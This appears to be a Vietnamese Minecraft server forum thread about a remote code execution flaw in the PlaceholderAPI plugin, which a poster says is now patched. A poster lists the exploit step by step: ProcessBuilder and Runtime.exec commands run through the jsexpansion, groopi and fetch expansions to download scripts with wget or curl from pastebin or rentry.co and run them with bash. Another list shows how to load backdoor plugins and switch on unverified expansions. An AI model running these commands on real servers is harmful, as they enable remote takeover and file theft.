Thảo luận MC Server Lỗ hổng placeholderapi

[jordu]

hiện tại thì bị patch rồi nên quẩy tiếp đi

 

C

Hỏi về server  Xin cách để ẩn cái này ạ.

Hỏi về server  Server smp nên keepinventory hay không ?

[jordu]

View attachment 40114


hiện tại thì bị patch rồi nên quẩy tiếp đi

cách thực hiện cái exploit này


1: Griefer sẽ cài expansion này lên nạn nhân [/papi ecloud download javascript] lệnh cho các cháu không biết dùng placeholderapi
2: Nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("wget", "pastebin.com").start(); [trong cái pastebin có thể là một script vd như: reverse shell,etc...]
3 tiếp theo nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("bash", "shell").start(); để chạy script

dành cho các cháu muốn lạm dụng cái này để đi leak file thì bỏ đi vì nó bị patch rồi

 

[MaiMinhDung]

căng đấy

 

[jordu]

căng đấy

chắc giờ đỡ chứ từ mấy hôm trc thì hơn chục server bị leak file rồi :/

 

[MaiMinhDung]

chắc giờ đỡ chứ từ mấy hôm trc thì hơn chục server bị leak file rồi :/

uhm

 

[jordu]

một phút mặc niệm

 

[MaiMinhDung]

View attachment 40115View attachment 40116



một phút mặc niệm

nhiều thật

 

[jordu]

nhiều thật

còn một số server khác nhưng t không tiện nhắc tên v:

 

[anhcraft]

này dc dự đoán trc r, tụi aternos ban plugin này là đúng

 

[nhatngo1303]

cách thực hiện cái exploit này


1: Griefer sẽ cài expansion này lên nạn nhân [/papi ecloud download javascript] lệnh cho các cháu không biết dùng placeholderapi
2: Nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("wget", "pastebin.com").start(); [trong cái pastebin có thể là một script vd như: reverse shell,etc...]
3 tiếp theo nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("bash", "shell").start(); để chạy script

dành cho các cháu muốn lạm dụng cái này để đi leak file thì bỏ đi vì nó bị patch rồi

bọn Girefer đâu có quyền dùng lệnh đc?

 

[jordu]

bọn Girefer đâu có quyền dùng lệnh đc?

m cứ tưởng tượng nó tìm đc một cái port không có bảo mật xem?

 

[jordu]

bọn Girefer đâu có quyền dùng lệnh đc?

hiện tại thì author đã patch = cách không cho cài thông qua minecraft mà phải tải expasion + có config không cho dùng rồi

 

[thatcorona]

ge z

 

[jordu]

ge z

uk

 

[hoanglylonton]

Cung gke a nghen

 

[jordu]

Cung gke a nghen

rce exploit bi li

 

[hungaz]

uoc bi hack

 

[jordu]

uoc bi hack

uoc dc chit vo cua hung a zet

 

[hungaz]

uoc dc chit vo cua hung a zet

dmm

 

[jordu]

bonus: nếu server bạn sử dụng plugin plugmanX hoặc plugmanager,commandpanel thì hãy vào config của nó và tắt cái download đi vì nó cho phép download backdoor plugin

/cpi lmfao.jar transfer.sh
/papi register ../../CommandPanels/panels/lmfao.jar.yml
/papi parse me %rce_curl_-O_rentry.co
/papi parse me %rce_bash_raw%

/plugman download direct rce plugin


và một số extensions nên xoá:

fetch:
/papi ecloud download fetch
/papi reload
/papi parse me %fetch_ test 1 transfer.sh
/papi register ../../../fetch/test
/papi parse me %rce_curl_-O_rentry.co
/papi parse me %rce_bash_raw%

groopi:
/papi ecloud download groopi
/papi reload
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("curl -O rentry.co")%
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("bash raw")%

minepacks:
/papi ecloud download minepacks 1.0.6
/papi reload
/papi parse me %minepacks_set ./PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi parse me %minepacks_set ../PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi reload